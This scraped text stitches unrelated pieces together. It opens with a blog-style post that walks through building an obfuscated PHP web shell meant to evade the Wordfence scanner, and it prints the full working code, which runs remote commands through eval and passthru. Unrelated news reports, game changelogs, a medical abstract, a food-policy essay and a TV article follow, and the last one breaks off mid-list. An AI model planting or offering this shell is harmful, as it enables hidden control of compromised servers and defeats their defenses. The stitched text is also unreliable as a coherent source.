Introduction
First of , I 'd like to say that Wordfence have a pretty cool product and most people who intrude into someone 's server wo n't take this much effort to hide themselves . Most hackers who upload PHP shells usually just stick with a generic one they 've downloaded from a super priv8 hacker forum . Still , this shows how trivial it can be to bypass some systems .
Signatures Never The Answer
For those of you who do n't know what Wordfence is , it 's a leader in it 's field , a security plugin for WordPress which boasts over a million installs . This post does n't talk about how a PHP file has come onto the system , be it a vulnerable plugin or another part of the website , this is more on the detection of malicous files . Malicous script detection is a mammoth task , but is made easier by some hackers who simply upload they 're shell which is base64 'd and eval 'd . The way I evaded detection would primarily be used if the target was especially valuable , such as a government wordpress site or a multi-million pound company . Also take into account other security mechanisms that an administrator may put in place , this is no ‘ oh shit ' moment .
That said I was able to bypass in under an hour , I suspect mostly because it relies on signatures that have previously been marked as malicous , which is great , but is n't as effective as some may think when ‘ professionals ‘ wish to stay on the server . At first I simply tried something like this :
pAssThRu ( $ _GET [ ‘ x ' ] ) ;
Some detection systems have problems understanding the capatalisation of letters and so I thought this would be a good start , passthru works much like the exec or system function . To my knowledge exec and system are used more often and so I wanted to test out to see if all functions are found as malicous , indeed this was the case . I then tested with a few web shells that I had which were obfuscated in various ways , shells like C99 or WSO for those interested , they were also detected successfully .
I then noticed that the eval function was not intially flagged up as malicous activity , which is perfectly right , because many web applications may need this function for purposes that are n't malicious . I then looked at how I could trick or atleast have something that was a little different from other obfuscators/malicious code . I thought that manipulating the strings in certain way was a good way to start , but did not attempt to involve the functions base64_decode or gzdeflate , as the combination of these and eval would surely flag something up ( although I have n't tried , give it a go ? ) . I first brought some filler variables into the mix , this is quite common in exploit kit code and executable crypting , where the variables are either blank or are never used to make the code seem legitimate .
$ a = “ ” ;
$ b = uniqid ( ) ;
I then declare variables for later use , I would use str_shuffle to shuffle the characters around , but it would n't matter because it would bring the output whatever I did , it is almost a form of primitive polymorphism .
$ a = “ aA ” ;
$ se = “ sS ” ;
$ b = “ bbBbBb ” ;
The b 's were filler like the above code , it was never going to be used , but $ a and $ se would , as the characters ‘ a ' and ‘ s ' are in the function passthru . The main aim of my code is to have the eval function basically call the first code passthru ( $ _GET [ ‘ x ' ] ) , but in a different way . With the the next two lines I decided to start using english sounding names to make it look less generated or obvious . I used the metaphone function to get some of the characters used in the code , in this case ‘ t ' and ‘ p ' .
$ tea = metaphone ( “ 0-ttttttt-ttttt ” ) ;
$ patrol = metaphone ( “ ……… .. p ” ) ;
I then used the strip_tags function to get the combination ‘ hr ' and ‘ u ' . Very simple function that probably has n't been used for malicious purposes like this before , what I was really trying to achieve was a completely unique payload .
$ ru = strip_tags ( “ < a > hr < /a > ” ) ;
$ uare = strip_tags ( “ < b > u < /b > ” ) ;
I then resorted to using the chr function which corresponds with ASCII , which I used for some of the characters like [ ] ( ) and ‘ , I later used some basic maths to get values with the chr function to add some difference to them .
$ cake = chr ( 40 ) ;
$ biscuit = chr ( 41 ) ;
$ coffee = chr ( 36 ) ;
$ family = chr ( ( 80+1 ) + ( 8 * 1 ) + ( 1+1 ) ) ;
$ tree = chr ( ( 70+11 ) + ( 8 * 1 ) + ( 1+3 ) ) ;
$ bark = chr ( 40-1 ) ;
I concatenated the first few variables to make the function which made it look like this :
I then included the remaining parts into an array like so :
All I had to do after this is simply put all of the variables in the right combination to make this work which was :
eval ( $ bench. $ park [ 0 ] . $ park [ 2 ] . $ park [ 3 ] . ” ET ” . $ park [ 4 ] . $ park [ 6 ] . ” x ” . $ park [ 6 ] . $ park [ 5 ] . $ park [ 1 ] . ” ; ” ) ;
With this code I could now successfully execute some commands remotely . Like so :
I scanned with the latest version of Wordfence and it found no malicious scripts . SUCCESS !
Full code :
< ? php
$ a = “ ” ;
$ b = uniqid ( ) ; $ a = “ aA ” ;
$ se = “ sS ” ;
$ b = “ bbBbBb ” ;
$ tea = metaphone ( “ 0-ttttttt-ttttt ” ) ;
$ patrol = metaphone ( “ ……… .. p ” ) ;
$ ru = strip_tags ( “ < a > hr < /a > ” ) ;
$ uare = strip_tags ( “ < b > u < /b > ” ) ;
$ cake = chr ( 40 ) ;
$ biscuit = chr ( 41 ) ;
$ coffee = chr ( 36 ) ;
$ under = strip_tags ( “ < p > _G < /p > < i > ” ) ;
$ family = chr ( ( 80+1 ) + ( 8 * 1 ) + ( 1+1 ) ) ;
$ tree = chr ( ( 70+11 ) + ( 8 * 1 ) + ( 1+3 ) ) ;
$ bark = chr ( 40-1 ) ; $ bench = ( $ patrol.str_shuffle ( $ a [ 0 ] ) . str_shuffle ( $ se ) . $ tea [ 0 ] . $ ru . $ uare ) ; $ park = [ $ cake , $ biscuit , $ coffee , $ under , $ family , $ tree , $ bark ] ; eval ( $ bench. $ park [ 0 ] . $ park [ 2 ] . $ park [ 3 ] . ” ET ” . $ park [ 4 ] . $ park [ 6 ] . ” x ” . $ park [ 6 ] . $ park [ 5 ] . $ park [ 1 ] . ” ; ” ) ;
? >
Conclusion
The most popular security system for WordPress was unable to identify the malicous code I created , It is rather hard to differentiate with PHP what is malicious and benign as shown here , even if code analysis is used as advertised by Wordfence . UnPHP was unable to handle how I was obfuscating my script as well . It 's not of upmost importance , as many hackers do n't go past the norm with PHP shells , but it is something to think about .
An illegal immigrant from Mexico has admitted to strangling a 30-year-old New Jersey woman he worked with , and setting her body and house on fire to cover up the crime .
Juan Jimenez-Olivera , 30 , pleaded guilty Wednesday to murder , aggravated arson , desecrating human remains , theft and related offenses in the slaying of Sviatlana Dranko , his co-worker at a pizzeria .
Jimenez-Olivera admitted in court to strangling Dranko in April 2014 in her Hillsborough home , stealing $ 6,000 and lying to police about his involvement before turning himself in two days later .
Guilty : Juan Jimenez-Olivera ( left ) , an illegal immigrant from Mexico , has pleaded guilty to murder , aggravated arson , desecrating human remains and related counts in the slaying of Sviatlana Dranko ( right )
Blaze : Dranko was found dead inside her Hillsborough , New Jersey , home on April 29 , 2014 , by firefighters responding to a blaze
An investigation later determined that Dranko had died from strangulation before the fire ignited
Prosecutors say he put a pillow case over Dranko 's face and used a lighter to start the blaze .
In exchange for his guilty pleas , the state has agreed to drop a first-degree aggravated sexual assault charge and recommend a 30-year sentence without the possibility of parole on the murder count .
The defendant is facing an additional five-year sentence , to be served consecutively , for desecrating the victim 's remains , according to NJ.com .
The Hillsborough man is in the country illegally and a judge says he could be deported .
Jimenez-Olivera remains in the Somerset County Jail pending his September 18 sentencing . His $ 1million bail has been revoked .
On April 29 , 2014 , at 8.23am , police and firefighters from multiple departments responded to Dranko 's home in Bloomingdale Drive in response to calls about a fire .
Upon entering the house , first responders found Dranko dead with severe burns to her body inside a second-floor bedroom .
Innocent : Dranko ( left and right ) and Jimenez-Olivera worked together at a pizza place but were not involved romantically
Undocumented : Jimenez-Olivera is in the country illegally and a judge says he could be deported
An investigation later determined that Dranko was dead before the fire ignited .
Jimenez-Olivera was arrested two days later after turning himself in and charged in Dranko 's death .
Detectives said the two did not have a romantic relationship and were only workplace acquaintances .
Following a soft-opening as well as family and friends previews , famed Italian restaurant Michael 's Pizzeria is now open for daily business on the Promenade just north of Congregation Ale House and Beachwood BBQ & Brewery .
The restaurant shocked the culinary world when last year , Zagat called its Naples locale the best Italian restaurant as well as the best pizza in the Los Angeles region . It 's formal opening in essence caps of what is turning out to be a renaissance within downtown Long Beach , particularly after Beachwood was just recognized as the best brewpub in Southern California and the Promenade itself celebrated the completion of the $ 11.7 million development .
This marks the restaurant 's third location , with its original in the aforementioned Naples as well as a pizzeria in Rancho Mirage just outside of Palm Springs .
There is reason for the hype : Michael 's offers what is becoming an enormously increasing trend—Neapolitan-style , wood oven , unsliced pizza—but on a level that reminds one of the simpler things . Here , they make in house their own mozzarella , pesto , sausage , salsiccia , and stracciatella . Here , you wo n't find five toppings on a cheese pizza but perhaps a few , like the prosciutto and arugula pizza or the clam and pepperoncino pizza . Here , one is reminded that great food is not overtly complicated ( and can be found at even the most casual of places ) .
Michael 's Pizzeria is located at 210 E. Third St. For more information , call 562-491-2100 .
Read more :
{ FG_GEOMAP [ 33.7703971 , -118.19076519999999 ] FG_GEOMAP }
Good news for anyone who 's paid for the full version - you 're getting new stuff for your money now !
Remember this ?
I 'm sure you do ; )
Gender swapping is available to everyone using the Misc [ BACKSPACE ] menu .
Head customisation is now available to all paid players in-game in all servers . Enjoy wearing flashy hats , helmets and haircuts in-game ! For those that have been hoping for a more custom ( Do-it-yourself ) form of customisation - patience ! We 're contemplating adding that but will need to figure out a way of making it ergonomic for you guys…
Knight combat has been changed fairly significantly :
Two colliding hits will now bounce off each other !
Getting hurt interrupts charging ( this applies to archers too )
Jab no longer stuns but does push away ( this applies to builder hits too )
If two knights jab or slash at each other they clash !
Not actual game footage .
Other key changes include bridges being two way platforms and not blocking arrows ( allowing for quite complicated team-only structures and elaborate traps , not to mention disguised pathways and more intuitive elevators than doorladders as well as being pretty crap for skybridging now as you can be shot with ease ) .
Just press [ S ] ( crouch ) on a bridge to fall off it .
The camera is now fixed on the player . You can scroll by moving your mouse to the edge of the screen . This change is mainly for new players ( especially ones that never played Soldat ) . You can easily return to the old camera system in main menu - > Player .
An arrow indicating bomb throw direction , many UI improvements ( catapult menu especially ) , a bunch of things to assist in making guards lives easier including the name of anyone causing a collapse in the console , and the usual pile of tweaks likely to garner a thousand complaints ; ) ( although we tested these for nearly a week to make sure they are good )
Changelog B190a to B200 :
- added female characters ( player customization ) ( [ BACKSPACE ] in-game )
- added head customizations ( [ BACKSPACE ] in-game ) - Misc menu ( backspace ) does n't require holding key
- bridges are now two-way platforms ( drop from them with down key [ S ] )
- arrows go through bridges
- removed Advanced Movement tutorial
- fixed arched not falling from top tree
- all objects now fall through bottom of map ( flag respawns after falling there )
- increased pick radius of pie menus
- pie menu items are also selected with left mouse click
- fixed collapsed blocks not disappearing at the bottom of the map
- fixed not being able to build castle background over spikes
- fixed spiked castled background not giving support
- catapult fire progress is always displayed when in fire mode
- fixed catapult not changing team on fire
- fixed shield ladder not working on ladders
- removed “ test ” name above head
- tweaked bomb throwing
- added throw direction arrow on HUD
- fixed bomb wall bounces
- fixes in fast moving player/map collision
- optimized map collision code
- misc menu ( BACKSPACE ) does n't require holding the key
- fixed bridge open/close glitch
- rcon commands are logged in console ( [ RCON FROM PLAYER_NAME ] )
- admin/guard : [ F3 ] key freezes [ F2 ] key unfreezes player
- added “ COLLAPSE by PLAYER_NAME ” in console log
- ca n't switch to team with units depleted
- removed tutorial box and emoticons from tutorial display
- fixed joining game errors
- added fixed camera on/off option in main menu ( Player tab )
- lowered bomb jump velocity
- bridges can be built on dirt background
- removed material dropping when overloaded
- hovering mouse on player and pressing chat adds his name to chat ( works for chat menu too )
- tweaked jumping
- help UI improvements
- 30 % of fallen coins is lost ( not dropped ) on death
- near spawn respawn multiplier multiplies half the time for outpost
- HUD does n't fade out if typing in chat
- break time is now set based on a multiplier ( the lowest team size )
- unit counter is now set based on a multiplier ( the lowest team size )
- added 1 archer discharge frame
- fixed \loadmap [ name ] command - loads the map from the folder Maps/ [ name ] .png
- added sword blocks when hot other sword
- bomb sparks turn red when approaching explosion time
Combat :
- you lose charge on being hit
- fixed slash on team player
- fixed knight hitting after being hit
- fixes in knight double slashes
- ca n't hit or shield for 0.5s after being hit
Zombie survival is next on the TODO ( : D )
Geti
Gary Gygax was n't the father of Dungeons and Dragons . He was the weird uncle that lived in the basement , painted lead miniatures , and could expound on the twelve different types of polearm weapons . So it 's understandable that gamers might have trouble talking about it openly . Instead , here are some ways to refer to Gygax 's untimely passing…you know , without really saying it :
When referring to Gygax 's death , you can say he :
1 ) Started a new character sheet . 2 ) Is looking for a ninth-level cleric . 3 ) Failed his save vs. death magic . 4 ) Is food for purple worms . 5 ) Immediately became an NPC . 6 ) Finished the Doritos . 7 ) Has gone pips up . 8 ) Is pushing up shriekers . 9 ) Cashed in his gold pieces . 10 ) Took the first step to lichdom . 11 ) Went ethereal . 12 ) Kicked on the end of a spear . 13 ) Did n't make his system shock roll . 14 ) Bought the farm in Hommlet . 15 ) Is taking a die nap . 16 ) Has gone to meet Zagyg . 17 ) Rolled his last natural 20 . 18 ) Went against the giants . 19 ) Joined the gaming table invisible . 20 ) Is sleeping with the sahuagin . 21 ) Drew the Void . 22 ) Ended the campaign . 23 ) Kicked the dice bag . 24 ) Retired Mordenkainen . 25 ) Got screwed by the DM .
Previous studies of the association between symptoms of anxiety or depression and coronary artery calcium ( CAC ) have produced heterogeneous results . Our aim was to investigate whether psychopathological symptoms were associated with CAC in a cross-sectional analysis of the Brazilian Longitudinal Study of Adult Health ( ELSA-Brasil ) baseline . We analyzed data from 4,279 ELSA-Brasil subjects ( aged 35 to 74 years ) from the São Paulo site without previous cardiovascular disease who underwent CAC score assessment at baseline . Prevalent CAC was defined as a CAC score > 0 . Anxiety and depressive symptoms were assessed using the Clinical Interview Schedule-Revised ( CIS-R ) . We built binary logistic regression models to determine whether CIS-R scores , anxiety , or depression were associated with prevalent CAC . Prevalent CAC was found in 1,211 subjects ( 28.3 % ) . After adjustment for age and gender , a direct association between CIS-R scores and prevalent CAC was revealed ( odds ratio for 1-SD increase : 1.12 ; 95 % confidence interval [ CI ] 1.04 to 1.22 ) . This association persisted after multivariate adjustment ( odds ratio for 1-SD increase 1.11 ; 95 % CI 1.02 to 1.20 ) . No independent associations were found for specific diagnoses of anxiety or depression and prevalent CAC . In post hoc models , a significant interaction term ( p = 0.019 ) suggested a stronger association in older subjects . In conclusion , psychopathological symptoms were directly associated with coronary atherosclerosis in the ELSA-Brasil baseline in adjusted models , and this association seems to be stronger in older subjects .
Copyright © 2016 Elsevier Inc. All rights reserved .
The leader of the Jewish Labour Movement says he 's ‘ delighted ' to have been elected as a councillor in Borehamwood .
Jeremy Corbyn tweeted his congratulations to Jeremy Newmark , following his successful election win in Borehamwood Kenilworth ward by-election over the weekend .
The vote was tinged with controversy after Hertsmere Borough Council planned it for the first day of succot . However , that did n't affect the JLM leader 's chances , as Newmark defeated his Conservative rival Pat Strack with 383 votes to 341 .
Get The Jewish News Daily Edition by email and never miss our top stories Free Sign Up
Speaking to Jewish News , Newmark said : “ I am delighted with this result . It shows that there are no no-go areas for Labour . I am looking forward to working to get a better deal for the residents of Borehamwood . I am particularly grateful to my local Constituency and Branch Labour Parties whose dedication and commitment enabled me to contest this seat whilst observing Succot without compromise . ”
One in ten voters were thought to have been affected by the clash , in a ward with an 11 percent Jewish population .
Taking to Twitter , Jeremy Corbyn said : “ Congratulations Jeremy Newmark on winning Borehamwood Kenilworth from the Tories yesterday . Fantastic result for Labour and Hertfordshire . ”
During the Labour Party 's annual conference , Jeremy Newmark and the JLM spearheaded a rule change to the party enabling it to tackle anti-Semitism more quickly and effectively .
More than a million Labour votes — 98 per cent of those eligible — approved the change in the party 's constitution , which had the backing of Corbyn and senior cabinet figures .
Also contesting the election were candidates from the Liberal Democrats , UKIP and an Independent .
Hey all ,
Excuse the silence on the upcoming beta 2.3 as of late . We have decided to release these newsletters roughly in the middle of the wait for each major release for Wayward , instead of the original bi-monthly plan . We are still working hard on all the new planned changes , and even some yet-to-be-announced-ultra-mega-secret ones . More on that another time ; let 's start it off with the postmortem on beta 2.2 .
Beta 2.2 Postmortem
With beta 2.2 , we saw the biggest major patch to date with close to 150 changes and additions . It was n't without its issues though , prompting a couple quick hotfixes and quicker patches after the release . We try to mitigate this as much as possible , but our resources are limited as always . We appreciate all the early access players coming along for the ride and helping us discover the bugs and help improve Wayward with suggestions .
We were pretty happy with the release overall , and players seemed to enjoy all the new goodies as well . There was a large focus on balance and new-player experience improvements in beta 2.2 , as well as the subsequent minor patches . We would like to continue that trend with beta 2.3 ; however , we would maybe like to skew it more to the general improvements , bug fixes , and new additions side of things a bit more to keep the older players coming back for the major releases as well .
Beta 2.3 Media
We 've already revealed some upcoming beta 2.3 features via social media , but here 's a round-up of all the beta 2.3 media thus far :
Preview of tilling and gardening changes :
Preview of the new character customization options ( with options to name your save and set your seed ) :
Preview of new fire options and balances . Showing ability to drop items on to fire sources and fire spreading caused by over-stoking a fire :
New Developer !
Another bit of news is we have recently gathered a new developer to add to our small team of part-time workers . Welcome , Mackenzie ‘ Aarilight ' McClane to the team , a long standing community member . While we ca n't promise faster results , we can likely promise more results . Beta 2.3 is already at over 140 changes/additions .
Newsletter Subscription & Updates
If you would like to get these newsletters delivered via email , you can subscribe to our mailing list .
If you would like to keep up to date on all the news , reveals and other going-ons , check out our Facebook , Twitter , and Subreddit .
Modding Guide Overhaul
With the beta 2.2.2 release , we released a brand new modding documentation and guide , available here : https : //waywardgame.github.io/
The guide itself is roughly the same as it was before , with some new information and frequently asked questions ; however , the documentation is the star here . You can now browse through every module , enum , function , hook , and more .
We were pretty rough on modders throughout beta 2.2 ; changing many things throughout each of the minor patches . It 's not intentional , but we like to provide the best tools for modification makers and sneak in everybody 's requests before the longer wait for the major . Unfortunately , with beta 2.3 's codebase going completely modular , beta 2.3 will bring more updates for modders to do to get their mods working . Apologies in advance , but we will try our best to document the updates required through the source code of the official mods .
Mod Showcase
Spawns
Amax is back at it again with “ Spawns ” , a mod that will allow you to choose what will and will not spawn in your game , basically allow you to disable certain types of creatures ( or all of them ) .
http : //steamcommunity.com/sharedfiles/filedetails/ ? id=845234657
Weightless
thepicko unleashes another popular mod that allows you to disable weight in Wayward . Casual players rejoice !
http : //steamcommunity.com/sharedfiles/filedetails/ ? id=783715246
Screenshot Showcase
We have seen some crazy Wayward screenshots lately . The amount of work and creativity Wayward players have shown is mind-boggling and always warms my heart . Here are a few of my recent favorites :
Chibale shows us their aberrant shark farming operation .
Takinshi shows off a very impressive end-game screenshot .
Royal Miku finally fell the cave kraken .
Check out all the latest screenshots : http : //steamcommunity.com/app/379210/screenshots/ ? p=1 & browsefilter=mostrecent
Steam Guide Showcase
There are not too many guides available for Wayward as of yet , but one recently posted one titled “ Common causes of early death : better living through not dying ” , comes to us from community member , printedship : http : //steamcommunity.com/sharedfiles/filedetails/ ? id=808330081
Some other guides of interest include ( self-promotion , yay ! ) :
Reporting Bugs & Debugging for Wayward : http : //steamcommunity.com/sharedfiles/filedetails/ ? id=798938225
Changing Betas/Branches for Wayward : http : //steamcommunity.com/sharedfiles/filedetails/ ? id=721479594
We would love your help in writing new guides for Wayward ! I 'll gladly provide any data you want from in-game if you ever need help on a certain topic . Just let me know !
Video Showcase
In the last little bit , we have seen two prominent let 's plays series on Wayward . The first one brought to you by DFuxa , a predominately roguelike YouTuber . The series is still ongoing and is on the 7th episode .
The next showcase is for Chigocraft , a german YouTuber that plays many survival and crafting games .
Thank you to all that make Wayward videos ! Appreciate you showing off the game !
And a another thanks to all of you coming on our Wayward journey with us .
Advertisement UPDATE : Woman set on fire in West Des Moines ; man charged Share Shares Copy Link Copy
West Des Moines police report Friday that a woman was intentionally set on fire.WATCH VIDEO HERE . Police said the incident was reported about 6:20 a.m.Officers were called to 127 8th Street on the report of a person who had been burned.Jackie Gilbert , 54 , suffered burns on her upper torso . Gilbert claimed that she and John Allecks Moore Jr. , 58 , were involved in an argument around 10 a.m. on Thursday.She said Moore threw an unknown flammable substance on her upper torso and set her on fire . Gilbert was taken to the hospital , and her wounds are not believed to be life-threatening , police said . `` This is a first for me , but I do n't know I have ever heard of that before , someone intentionally lighting someone else on fire , '' said West Des Moines police spokesman Sgt . Brent Kock.Police said Moore was intoxicated when they arrived at the house , an address they seemed well-acquainted.WDM police data shows in 2015 , police have been called to the home 54 times , most for medical calls , including falls , seizures and chest pain.But several calls were also received by police concerning criminal nature , including a burglary , domestic assault , theft and violation of a no-contact order.Neighbors told KCCI police cars and ambulances are regular visitors to the home , located near Eighth Street and Railroad Avenue west of Valley Junction. “ I always wondered what was going on over there , ” said one neighbor . “ I figured someone was fighting over there , but I did n't know he went that far to set her on fire. ” Gilbert did n't call police for almost 24 hours. “ We do n't know what led to the deal of the victim calling and reporting it , ” said Kock . “ We 're trying to actually find out what took place during that time. ” Moore was charged with willful injury causing bodily injury in connection with the case . He 's being held in the Polk County Jail , pending bail of $ 10,000 . More charges are possible.Look for more on this story coming up on KCCI-TV , kcci.com , mobile site , Facebook page , and apps .
Got Cheap Milk ?
As the U.S. government starts planning budget reductions that will slash everything from defense spending to health care to bridge repair , potential cuts worth around 0.00025 percent of the value of the deficit reduction agreed on in the recent $ 2 trillion deal appear to have garnered outsized attention : support to farmers ' markets . Those $ 5 million of subsidies are likely to disappear as part of cuts in the 2012 farm bill , and that is provoking much concern . The Farmers Market Coalition says the program is `` a unique success story in America 's agricultural policy . '' Perhaps it is no surprise : With supermarket chains from Whole Foods to Safeway trumpeting their healthy produce from farmers just down the road , buying local and eating non-genetically modified organic food is surely the best thing for you and the planet . And that 's something government should get behind , right ?
Actually , no — these First-World food fetishes are positively terrible for the world 's poorest people . If you want to do the right thing , give up on locavorism and organics über alles and become a globally conscious grocery buyer . This should be the age of the `` cosmovore '' — cosmopolitan consumers of the world 's food .
Let 's start with genetic modification ( GM ) — where genes from one organism are spliced into those of another by scientists in a lab . Poland 's agriculture minister , Marek Sawicki , recently called for an EU-wide ban on the growth or import of GM produce . But why new crops labeled GM should be more of a risk than new crops bred in the `` traditional '' manner — which often involves bombarding seeds with radiation to promote mutations — is a little unclear . It should n't come as a surprise that when the European Commission Research Directorate-General released a survey in 2001 of 81 studies on GM , human health , and environmental impact , not one of the studies found any evidence of harm . The World Health Organization recently confirmed that `` no effects on human health have been shown '' from eating GM foods .
Worries remain , though , in no small part due to the lack of major , rigorous analyses and the unwillingness of seed producers to share data . Of course , many GM crops have failed to deliver as advertised , and even in the best of cases they are certainly no panacea .
But there have also been successes — involving significant , positive impacts on environmental and financial outcomes . For example , economists Graham Brookes and Peter Barfoot of Britain 's PG Economics estimated that countries that adopted GM insect-resistant cotton saw a 13.3 percent increase in the value of their 2005 cotton crop , as well as a 95 percent reduction in the use of insecticides . There is every reason to do more research and testing on both the threats and potential benefits of GM , but there 's no reason to demonize it .
What about `` local '' ? Perhaps locally grown produce tastes better to some people . And perhaps it is psychologically better to have close contact with the people who grow your food . But that does n't make it good for the environment . For example , it is twice as energy efficient for people in Britain to eat dairy products from New Zealand than from domestic producers . It is four times more energy efficient for them to eat lamb shipped from the other side of the world than it is to eat British lamb . That 's because transporting the final product accounts for only a small part of the energy consumed in the production and delivery of food . It 's far better to eat foods from places where production itself is more efficient . For example , New Zealand cattle eat clover from the fields while British livestock tend to rely on feed — which itself is often imported .
And why should n't developing countries strive to be the world 's breadbasket ? Again , there may be transport costs in flying fresh produce from southern Africa to Europe or the United States , but you save all of the heating , lighting , and construction costs associated with hothouse produce grown in the gloom of a European or North American winter . It is good news that Gambia managed to increase its fruit and vegetable exports to the European Union by 25 percent over the past 10 years — to 123,000 tons . We should n't be kicking the legs out from under such efforts in a misguided attempt to build an Arcadia under glass .
And the environmental benefits of organic in terms of lower energy costs and less pollution ? Norman Borlaug , father of the Green Revolution , estimated that we would need 5 billion to 6 billion additional cows to produce enough natural fertilizer to sustain our current crop production — which , of course , would increase the demand for forage crops and thus the need for agricultural land . Meanwhile , weed-killing herbicides allow for no-till farming . When you do n't plough , you do n't erode topsoil nearly as much — so it does n't end up being washed into rivers , leaving behind a dust bowl .
Whether organic is as efficient as conventional farming — in terms of land yield , energy , or labor productivity — depends on the place and the crop . But even organic sympathizers report that the average land yield in the industrial world is about 8 percent lower on organic farms than on conventional ones . And it only takes a trip to the local supermarket to understand there 's a considerable price premium to be paid . Organic milk costs as much as twice the regular kind , for example . The practices of industrial-scale U.S. producers like Stonyfield Farm , which dries organic milk from those energy-efficient New Zealand producers into powder in order to ship it to its plant in Londonderry , New Hampshire , where it 's turned into yogurt , keep organic dairy prices climbing even higher .
That lower agricultural efficiency really matters . Because what we definitely know is that , compared with the unsubstantiated health risks of GM or the illusive health benefits of organic crops , there are undoubtedly health risks to not having enough — or enough variety — to eat . There are still as many as 1 billion people worldwide who are malnourished ; and many are living on around a dollar a day . The best way to help poor people eat well is to make healthy food cost less . But the more agricultural land we divert into lower-efficiency organic production , the higher the price of all food will climb . On test farms , organic production has been shown to be at least as efficient as conventional farming — and considerably more productive than the average efficiency seen on farms in the developing world . But until that 's widely replicated outside agricultural research stations , organic is no friend to the world 's poorest consumers .
And all this misguided , parochial Luddism is having a real effect on the ability of producers in low-income countries to climb out of poverty in an environmentally sustainable manner . Most of the world 's poorest people are farmers . Many live in water-stressed environments on fragile land . Herbicides and GM crops may be an important part of the story when it comes to raising their productivity . But 15 years after GM crops were first planted commercially , Kenya , South Africa , and Burkina Faso are the only sub-Saharan African countries that have authorized the planting of any GM crops . That 's partly because European aid agencies have funded consultants to design regulatory systems based on the restrictive model adopted in Europe . And European NGOs have also threatened African governments that their agricultural exports to Europe would suffer from significantly reduced demand if they were planted even in the vicinity of GM crops .
So how should you eat as a responsible global citizen ? Consume less meat and oppose Western farm-subsidy programs — especially if they focus on livestock . Campaign against U.S. biofuel programs , which divert corn into grossly inefficient energy production . Embrace further testing and analysis of GM crops . Encourage public funding of research and intellectual property laws that ensure that poor farmers are not priced out of the potential benefits of GM seeds . Spend only on organic food that is as energy- and land-efficient as conventional production . And be a smart consumer : Local produce grown out of season and meat raised on imported feed is n't friendly to you , the environment , or the developing world .
6 Ways the Sixth Season of ‘ True Blood ' Could Get Back on Track
It 's been more or less agreed upon by critiques and fandom , that the last two seasons of True Blood have gotten off track and not lived up to the standard created in the early seasons . Personally , I still find season 4 to be fairly enjoyable , though the momentum begins slowing down significantly . I 've been rewatching the show for the past couple of weeks and am I struggling through season 5 ; a good deal of fast forwarding has taken place . There 's very little that redeems season 5 , which is extremely disappointing considering the return of fan favorites Russell Edgington ( Denis O'Hare ) and Steve Newlin ( Michael McMillian ) . Being the optimist that I am , however , I submit a few potential narrative improvements that I 'm rooting to see revive the feel for the upcoming season 6 , premiering this Sunday , June 16th .
6 . Dial Back the Bellefluers
Let me first clarify , that I love having Andy ( Chris Bauer ) , Terry ( Todd Lowe ) , and Arlene ( Carrie Preston ) in the mix . I think the way the actors have realized these characters , who typically only make brief appearances in the Sookie Stackhouse novels , is all around delightful . Plus with so many gorgeous supernaturals running around , having a few averages , old human characters keeps things in balance , as well as offering an opportunity for comic relief . The problem is that they 're not really grounded anymore , or even dwelling very close to the realm of sensibility . I want to see this group get interesting plotlines that can be well executed , but I strongly vote on just cutting down said plotlines if the writers ca n't do much better than what we 've seen lately .
Watching Andy deal with V ( vampire blood ) addiction in season 4 was absurdly repetitive . He went through the same essential addict struggles that we saw Jason ( Ryan Kwanten ) deal with in season 1 , but with even less payoff or intrigue . His romance with Holly ( Lauren Bowles ) is a nice B story , but the season 5 finale with Andy 's fairy fling , Maurella ( Kristina Anapau ) , giving orgasmic birth to a litter of fairy babies on the Merlotte 's pool table was… Well , I 'll put it this way , my husband ( not a regular viewer ) walked in on the show during this scene and asked me , “ Why do you watch this again ? ” I still have no response that can truly justify… that .
Next up , I have to go after Terry 's wartime flashbacks that eventually translate into Terry and a commanding officer that he toured with , Patrick Devins ( Scott Foley ) , trying to evade an Ifrit fire vengeance demon . Taking a serious look at Terry 's backstory seems like it would be a great idea and throwing in Scott Foley was a nice bonus . The narrative execution , however , felt half-hearted . The storyline of soldiers opening fire and killing civilians seems like it would be incredibly compelling , but the threat never really felt that significant . Plus the special effects of the actual monster were laughable .
5 . Ease Off the CGI
There is no way to take the Ifrit smoke monster seriously , and the while the god Lilith is a cool image when she 's walking around covered in blood , the unrealistic way she emerges from a puddle of blood is another element that works better in concept than actuality . Game of Thrones has just set the bar too high for this level of special effects to be acceptable in such a high quantity on premium cable television .
Where True Blood shines in special effects is the gore and blood department ( would n't that be a fun place to work ! ) . Anytime Eric Northman ( Alexander Skarsgård ) makes a kill is usually a highlight . And there have been so many out-of-left-field creepily effective scenes . A few examples that jump out : Tara ( Rutina Wesley ) and Eggs ( Mehcad Brooks ) dining on Maryann 's ( Michelle Forbes ) Hunter 's Soufflé , Bill ( Stephen Moyer ) twisting his maker , Lorena 's ( Mariana Klaveno ) , head around while having angry hate sex , and very recently , Sam ( Sam Trammell ) flying into Rosalyn 's ( Carolyn Hennesy ) mouth as a fly and then turning human while inside her causing a vampire explosion ( this scene used a mix of computer effects , but the bloody splatter is the prime highlight ) . The smaller , focused special effects are so much more fun to watch than over-the-top CGI .
Another staple special effect , is the constant animal transformations for the various two-natured creatures . True Blood 's transformation method is simple and straight forward . It works without distracting viewers too much , but I still think these could be cut down on . Only because ( and I ca n't believe I 'm saying this ) , but I 'd rather see the actors spend a bit more time with their clothes on . After nearly every transformation , we generally get an eyeful – often from multiple actors as once . Honestly , though , it 's happening so often that it 's kind of losing the sexy excitement . Maybe that 's just me , though .
4 . Pack Unity
Alcide Herveaux ( Joe Manganiello ) is an easy character to get behind and root for . He 's fair-minded , a loyal friend , and has abs that simply go beyond reason . His personal storyline has had two major points to revolve around : his psychotic , V-addicted girlfriend , Debbie Pelt ( Brit Morgan ) – she does n't deserve an RIP – and unending conflicts with local werepacks . While I appreciate the drama and understand that Alcide needs to overcome obstacles in order to grow into leadership , I 'm hoping that we can see some of the benefits from being in an aligned , united pack . This should be one of those clubs that are just too cool to ever possibly be able to join , not to mention hardcore badass . Why would a sensible wereperson even fool with so much drama and unfavorable tradition ( like scarfing down the remains of dead packmasters ) if he/she had the option to go solo ?
Werewolves seem to just be automatic subplots in most vampire stories , and True Blood really has n't been an exception ever since the wolves ' introductory storyline wrapped up in season 3 . I understand that they 're wild and follow their own code , but I 'm ready to see Alcide 's ascension bring things together . A highlight for this show is when storylines begin to merge , and the wolves feel like they 're becoming more and more adrift . Also , would n't it be cool if the producers actually worked in Quinn the Weretiger to oversee the packmaster trials ? I 'm not holding my breath for it , but it would be a pleasant surprise if he were cast correctly .
3 . Keep the Authority in the Background
